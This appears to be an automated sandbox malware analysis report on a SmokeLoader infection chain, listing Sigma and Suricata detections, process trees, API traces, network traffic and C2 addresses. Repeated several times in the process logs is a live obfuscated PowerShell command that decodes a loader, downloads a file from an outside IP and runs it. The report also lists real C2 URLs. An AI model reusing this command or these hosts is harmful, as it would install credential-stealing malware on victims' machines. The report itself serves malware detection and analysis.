iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", ProcessId: 8152, ProcessName: csc.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wihaduv, CommandLine: C:\Users\user\AppData\Roaming\wihaduv, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wihaduv, NewProcessName: C:\Users\user\AppData\Roaming\wihaduv, OriginalFileName: C:\Users\user\AppData\Roaming\wihaduv, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\wihaduv, ProcessId: 1556, ProcessName: wihaduv

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7848, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , ProcessId: 1384, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7848, TargetFilename: C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", ProcessId: 8152, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Malicious Base64 Encoded Payload In Image

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-23T08:15:00.290944+0200	2049038	1	A Network Trojan was detected	142.250.185.193	443	192.168.2.10	49778	TCP

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-23T08:15:42.990854+0200	2039103	1	A Network Trojan was detected	192.168.2.10	49980	45.91.8.152	80	TCP
2024-10-23T08:15:48.908087+0200	2039103	1	A Network Trojan was detected	192.168.2.10	49981	45.91.8.152	80	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-23T08:15:43.287323+0200	2829848	2	Potentially Bad Traffic	45.91.8.152	80	192.168.2.10	49980	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Multi AV Scanner detection for domain / URL

Source: prolinice.ga

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for submitted file

Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	ReversingLabs: Detection: 18%
Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	Virustotal: Detection: 27%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02973098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	19_2_02973098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02973717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	19_2_02973717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02973E04 RtlCompareMemory,CryptUnprotectData,	19_2_02973E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0297123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	19_2_0297123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02971198 CryptBinaryToStringA,CryptBinaryToStringA,	19_2_02971198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_029711E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	19_2_029711E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02971FCE CryptUnprotectData,RtlMoveMemory,	19_2_02971FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_032026AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	21_2_032026AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C2178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	22_2_02C2178C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C2118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	22_2_02C2118D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A2263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	24_2_02A2263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A22404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	24_2_02A22404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A2245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	24_2_02A2245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 30_2_00152799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	30_2_00152799
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 30_2_001525A4 CryptBinaryToStringA,CryptBinaryToStringA,	30_2_001525A4

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.10:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49778 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330054592.0000000007610000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330430112.0000000007691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aspnet_regbrowsers.pdb source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_regbrowsers.pdbl source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: q6C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.pdb source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02972B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	19_2_02972B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02973ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	19_2_02973ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02971D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	19_2_02971D4A
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD30A8 FindFirstFileW,FindNextFileW,FindClose,	20_2_00FD30A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0320255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	21_2_0320255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	22_2_02C214D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	22_2_02C213FE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	22_2_02C215BE
Source: C:\Windows\explorer.exe	Code function: 23_2_00A01DB0 FindFirstFileW,FindNextFileW,FindClose,	23_2_00A01DB0
Source: C:\Windows\explorer.exe	Code function: 23_2_00A01EB4 FindFirstFileW,FindNextFileW,FindClose,	23_2_00A01EB4

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49980 -> 45.91.8.152:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49981 -> 45.91.8.152:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 142.250.185.193:443 -> 192.168.2.10:49778

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 45.91.8.152 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://prolinice.ga/index.php
Source: Malware configuration extractor	URLs: http://vilendar.ga/index.php

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /600/ERFCEE.txt HTTP/1.1Host: 172.245.135.166Connection: Keep-Alive

Source: Joe Sandbox View

ASN Name: SERV-TECHRU SERV-TECHRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 45.91.8.152:80 -> 192.168.2.10:49980

Source: global traffic	HTTP traffic detected: GET /600/seethebestthingsentiretimewithgreatthignstoebe.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.135.166Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvhejqgucymxstkj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: prolinice.ga
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: prolinice.ga

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
